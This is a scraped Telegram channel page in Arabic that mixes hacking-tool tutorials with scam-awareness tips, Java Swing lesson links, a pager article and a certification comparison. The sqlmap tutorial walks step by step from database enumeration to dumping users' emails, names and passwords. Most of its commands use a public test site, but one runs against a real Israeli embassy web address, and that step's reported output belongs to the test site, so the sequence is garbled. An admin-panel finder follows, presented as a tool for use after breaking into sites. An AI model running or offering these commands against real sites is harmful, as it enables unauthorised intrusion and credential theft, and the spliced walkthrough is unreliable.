Telegram Web
شرح اليوم هو عن اداة nikto لفحص المواقع من الثغرات والبورتات المفتوحة

اوامر تثبيتها

pkg update

pkg install git

pkg install perl

امر تنصيبها
git clone https://github.com/sullo/nikto

cd nikto

cd program

امر فتح الاداة
perl nikto.pl

امر فحص الموقع المطلوب

perl nikto.pl -h رابط الموقع

بعدها ننتظر حتى يكتمل من الفحص

#CS
اداة ‏#Sudomy هي أداة لتعداد النطاقات الفرعية الهدف منها جمع وتحليل النطاقات الفرعية، وتنفيذ الاستطلاع الآلي لاكتشاف الثغرات (recon) لاختبار الاختراق أو البحث عن الثغرات الأمنية.

https://github.com/screetsec/Sudomy

〰️〰️

www.tgoop.com/MuhammadAlush0997

تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
اداه: sqlmap
$ pkg update && pkg upgrade -y

$ apt install python python2

$ pkg install git

$ git clone https://github.com/sqlmapproject/sqlmap

$ cd sqlmap

$ chmod +x sqlmap.py

$ python2 sqlmap.py

جبت لكم طريقه عمل الأداة sqlmap اختراق موقع مصابة راح تتعلمون منها و سهله و بتفهمون لم تعملون قواعد بيانات راح تشوفون كل شي توصل لكم بداخل تريمكس

موقع مصاب

http://testphp.vulnweb.com/listproducts.php?cat=1


في بعض الأحيان ، يساعد استخدام -time-sec على تسريع العملية ، خاصةً عندما تكون استجابات الخادم بطيئة.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15



جلب اسم ال database او قواعد البيانات تبع الموقع عن طريق الامر
sqlmap -u https://embassies.gov.il/cairo/AboutIsrael/Pages/AboutIsraelContent.aspx.php?cat=1 --dbs


اسم الداتا بيز تبع الموقع acuart
بعد طلعنا اسم الداتا بيز راح نطلع اسماء الجداول الموجوده بالموقع و ذلك عن طريق الامر التالي
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables


بعد ما طلعنها راح نستخرج ما بداخل جدول user لان فيها user password
جلب ما بداخل جدول user

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns


بعدها بدنا نفتح كل الايميلات و اسماء مستخدمين الموقع و باسورداتهم عن طريق امر التالي
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump


ننتقل للخطوة التاليه و هي لوحه التحكم و كيف يتم جلبها

عادي جدا عن طريق ادوات كثيرة جدا تجلب لوحه تحكم الموقع

اولها اداه admin finder panel
شرح اداة استخراج لوحة التحكم بعد اختراق أي مواقع

امر تثبيت الأداة
 git clone https://github.com/bdblackhat/admin-panel-finder

امر فتح الأداة
 cd admin-panel-finder

امر اعطاء الصلاحيات للأداة
 chmod 777 admin_panel_finder.py


امر تشغيل الأداة
 python2 admin_panel_finder.py


بعدها سوف يطلب رابط الموقع
اكتب رابط الموقع الذي تريد استخراج لوحة التحكم الخاصة به

عند الإنتهاء من التحميل سوف يعطيك رابط لوحة التحكم الخاصة بالموقع

قم بنسخ الرابط ولصقه في المتصفح وتظهر لك لوحة التحكم الخاصة بالموقع
أداة ‏#NucleiFuzzer هي أداة جميله ومهمه   لاكتشاف #الثغرات في #تطبيقات_الويب مثل XSS، SQLi، SSRF، وإعادة التوجيه ، وما إلى ذلك.

📎 رابط الأداة:
https://github.com/0xKayala/NucleiFuzzer

〰️〰️

www.tgoop.com/MuhammadAlush0997

تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
تأكد من هوية الأشخاص الذين يراسلونك عبر مواقع التواصل الاجتماعي او اي وسيلة او جهة بسبب حالة طارئة مع إدعائهم أنهم مم اصدقائك أو اقربائك.

〰️〰️

www.tgoop.com/MuhammadAlush0997

تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
لا تثق في الصفحات التي تمثل شركات كبيرة او شخصيات عامة والتي لم تقم بالتحقق منها .... وان كنت ترغب في الحصول على مساعدة فافعل ذلك من خلال الجهات الرسمية والموثوقة.

〰️〰️

www.tgoop.com/MuhammadAlush0997

تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
في حال تقدمت بطلب عمل لوظيفة عبر الانترنت سيطلب منك حتماً ملئ استمارة الطلب يمكنك فعل ذلك لكن احذر من تدوين رقم حسابك البنكي وبطاقة الإئتمان.

〰️〰️

www.tgoop.com/MuhammadAlush0997

تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
تصلك رسائل الاحتيال عبر تقمص شخصية موظف في المصرف الذي تتعامل معه حيث يرسل اليك رسائل يطالبك فيها بمعلومات حول حسابك البنكي او بطاقة الائتمان بحجة التأكد من ارقامها ... احذر ولا تعطي معلومات بطاقتك لأي شخص او جهة كانت.

〰️〰️

www.tgoop.com/MuhammadAlush0997

تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
الاحتيال عبر خدعة تصفح حسابك
الكثير من المستخدمين تم الايقاع بهم على الشبكات الاجتماعية من خلال حيلة اعرف من تصفح حسابك على فيسبوك او اي شبكة تواصل اخرى.

〰️〰️

www.tgoop.com/MuhammadAlush0997

تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
إنشاء مربع نص JTextField.
Create a #JTextField

الكلاس JTextField يُستخدَم لإنشاء #مربع_نص عن طريق مكتبة #swing, أي كلاس نقوم بإنشاءه لا بُدَّ من إعطاءه كائن.

لقراءة الدرس #الثالث_والعشرون في JAVA من خلال الرابط الآتي :

https://www.nusurtech.ca/2024/09/java-swing-jtextfield.html
JavaScript DOM (Document Object Model) methods:

〰️〰️

www.tgoop.com/MuhammadAlush0997

تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
إنشاء مربع وقائمة إختيار في جافا .Java
Create a #CheckBox

مربع الإختيار ( CheckBox ) في Java هو عبارة عن أداة تمكِّن المستخدم من إختيار بعض الخيارات أو كلها من مجموعة من الخيارات.

لقراءة الدرس #الرابع_والعشرون في JAVA من خلال الرابط الآتي :

https://www.nusurtech.ca/2024/09/java-swing-checkbox.html
الكلاس JMenuBar لإنشاء قائمة منسدلة في جافا
Create a #JMenuBar

الكلاس ( JMenuBar ) يُستخدَم من أجل إنشاء قائمة منسدلة في النافذة, سوف نتعلم في هذا الدرس على كيفية إنشاء قائمة menu "قائمة منسدلة". في كثير من البرامج نُلاحظ أنه لا بد من إستخدام القوائم المنسدلة للتنقل في أقسام المشروع أو للتنقل في النماذج عن طريق القوائم المنسدلة.



لقراءة الدرس #السادس_والعشرون في JAVA من خلال الرابط الآتي :

https://www.nusurtech.ca/2024/09/java-swing-jmenubar.html
كتاب_تعلم_الاكسل_من_الصفر_حتى_الإحتراف_1.pdf
6.7 MB
كتاب PDF تعلم الاكسل من الصفر حتى الإحتراف، مدعم بالصور.

〰️〰️

www.tgoop.com/MuhammadAlush0997

تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
فيما يلي سلسلة دروس احترافية لمكتبة swing في جافا لبرمجة #واجهات_سطح_المكتب، لمن لا يعرف ماهي مكتبة swing إقرأ الوصف الآتي قبل الدخول للدروس :
الوصف 👈 مكتبة #Swing في جافا هي #مكتبة_رسومية تُستخدم لإنشاء #واجهات المستخدم الرسومية (GUI). تُعتبر Swing جزءاً من حزمة Java Foundation Classes (JFC)، وتتيح للمطورين بناء تطبيقات سطح المكتب بواجهات رسومية غنية. توفر Swing مجموعة من المكونات مثل الأزرار، القوائم، اللوحات، والنوافذ التي يمكن تخصيصها وتنسيقها بطرق متنوعة.

🧑‍💻إنشاء مربع نص JTextField.
https://www.nusurtech.ca/2024/09/java-swing-jtextfield.html

🧑‍💻إنشاء نافذة بإستخدام #JFrame.
https://www.nusurtech.ca/2024/07/java-swing-jframe.html

🧑‍💻انشاء ازرار بإستخدام JButton.
https://www.nusurtech.ca/2024/07/java-swing-jbutton.html

🧑‍💻إنشاء مربع وقائمة إختيار.
https://www.nusurtech.ca/2024/09/java-swing-checkbox.html

🧑‍💻الكلاس JList لإنشاء قائمة إختيار.
https://www.nusurtech.ca/2024/09/java-swing-jlist%20.html

🧑‍💻الكلاس JMenuBar لإنشاء قائمة منسدلة.
https://www.nusurtech.ca/2024/09/java-swing-jmenubar.html
كل شخص مهتم ببرمجة واجهات سطح المكتب بواسطة JavaFX يتفضل يشترك بالقناة المخصصة لدروس جافا

الرابط :
https://www.tgoop.com/JAVA_PT
نظرة عامة عن مكتبة #JavaFX وتهيئة بيئة العمل
JavaFX Overview

إن JavaFX هي مكتبة ضخمة تم تطويرها لبناء تطبيقات فيها #واجهة_مستخدم #GUI بالإعتماد على لغة #جافا. و JavaFX هي تقنية أطلقتها شركة Sum MicroSystems و JavaFX هي #تطبيقات تعمل ضمن لغة الجافا.

لقراءة الدرس #السابع_والعشرون في JAVA من خلال الرابط الآتي :

https://www.nusurtech.ca/2024/09/javafx-overview.html
ماهو جهاز الاتصال اللاسلكي بيجر ؟

البيجر: تكنولوجيا الاتصال التي لا تزال حاضرة في عصر الهواتف الذكية.
قد يبدو جهاز البيجر (أو جهاز النداء اللاسلكي) كقطعة أثرية من الماضي لكن رغم ظهور الهواتف الذكية التي تغمر حياتنا اليومية لا يزال للبيجر دورٌ بارز في مجالات معينة مما يجعله موضوعا يستحق تسليط الضوء عليه.

نشأة البيجر وتطوره :
أُخترع البيجر عام 1949 على يد المهندس الكندي ألفريد غروس وكان يُستخدم في البداية كوسيلة للتواصل داخل المؤسسات ومع مرور الوقت انتشر استخدامه في المستشفيات والمطاعم والمراكز التجارية حيث قدم حلاً مثالياً للتواصل السريع والفعال.

لماذا لا يزال البيجر مُستخدما ؟
على الرغم من تطور تقنيات الاتصال الحديثة تظل هناك بعض الأسباب التي تحافظ على استخدام البيجر مثل :
☝️الاعتمادية: تُعتبر أجهزة البيجر من الاجهزة تعمل ببطاريات تدوم لفترة طويلة، مما يجعلها خيارًا ممتازًا في البيئات التي تتطلب تواصلًا مستمرًا.
✌️الأمان: تعمل أجهزة البيجر عادةً على ترددات محددة مما يجعلها أقل عرضة للاختراق أو التجسس هذا أمر مهم بشكل خاص في المؤسسات الصحية، حيث تُستخدم لتفادي أي تداخل مع الأجهزة الطبية وكذلك المستشفيات للتواصل بين الأطباء والممرضين دون إحداث ضجيج.
#IT223 #بيجر #جهاز_لاسلكي

〰️〰️

www.tgoop.com/MuhammadAlush0997

تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
🛡️ ما هو الفرق بين شهادة +NETWORK وشهادة CCNA 🕸️ ؟

1️⃣ الشركة المانحة: 
شهادة +Network منتجة من طرف شركة CompTIA العالمية، في حين أن شهادة ‎#CCNA منتجة من طرف شركة Cisco.

2️⃣ التركيز:
شهادة +NETWORK تركز على المبادئ الأساسية لشبكات الكمبيوتر ‏والمهارات العامة، في حين تركز شهادة CCNA أكثر على تقنيات وأجهزة Cisco الخاصة.

3️⃣ المستوى:
شهادة +NETWORK تعتبر شهادة قدرات مبتدئة في شبكات الكمبيوتر، بينما تعتبر شهادة CCNA مستوى متوسط لتخصص شبكات ‎#Cisco.

4️⃣ الشهادات الأخرى:
شهادة +NETWORK هي شهادة مستقلة غير اعتمادية على شهادات أخرى، بينما تعتبر شهادة CCNA بداية لشهادات تكميلية أخرى في شبكات Cisco.

5️⃣ الموضوعات:
شهادة +NETWORK تشمل الموضوعات الأساسية مثل تصميم الشبكات، إعداد الشبكات، إدارة الشبكات والأمان الشبكي، في حين ‏تتعمق شهادة CCNA في أمور مثل تكنولوجيا التوجيه والتبديل وتكوين الشبكات والأمن.

6️⃣ المستوى المطلوب: 
للحصول على شهادة +NETWORK لا يوجد لديك متطلبات سابقة محددة، بينما يطلب للحصول على شهادة CCNA أن يكون لديك معرفة أساسية في تصميم وإدارة الشبكات.

7️⃣ النطاق والمحتوى:
شهادة +NETWORK تغطي مفاهيم أساسية في مجال الشبكات بصفة عامة، مثل التصميم والتركيب والتحكم والصيانة والأمان بينما شهادة CCNA تعتبر أعمق في المحتوى وتشمل تفاصيل تقنيات الشبكات مثل الشبكات اللاسلكية، بروتوكولات التوجيه والتبديل، الأمان وغيرها.

8️⃣ الاعتراف والتوظيف:
شهادة +NETWORK تُعترف بها على نطاق واسع في صناعة تكنولوجيا المعلومات، وتعتبر شهادة موثوقة لدى صاحب العمل وتعزز قدرات المتحصل عليها في الحصول على فرص وظيفية بينما شهادة CCNA هي شهادة ذات شهرة عالمية وتعتبر مرجعا عامًا في مجال الشبكات، وتُعترف بها من قِبل العديد من شركات الاتصالات وأقسام تقنية المعلومات، وتمنح الحاصل عليها فرص توظيف أفضل ورواتب أعلى.

〰️〰️

www.tgoop.com/MuhammadAlush0997

تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
اذا دخلت الى مواقع مشبوهة وتم اختراق جهازك فلن تتضرر وحدك، بل سوف يتضرر كل من يشترك معك في الشبكة "اخوانك، اخواتك، ابوك، امك" كلهم سيتم اختراق اجهزتهم وكشف خصوصياتهم وسحب بياناتهم الخاصة مع العلم ان المواقع المشبوهة تصل فيها نسبة الاختراق الى 80%.

〰️〰️

www.tgoop.com/MuhammadAlush0997

تابعني على :
Telegram | instagram | facebook | Twitter | YouTube
2024/11/04 14:38:19
Back to Top
HTML Embed Code: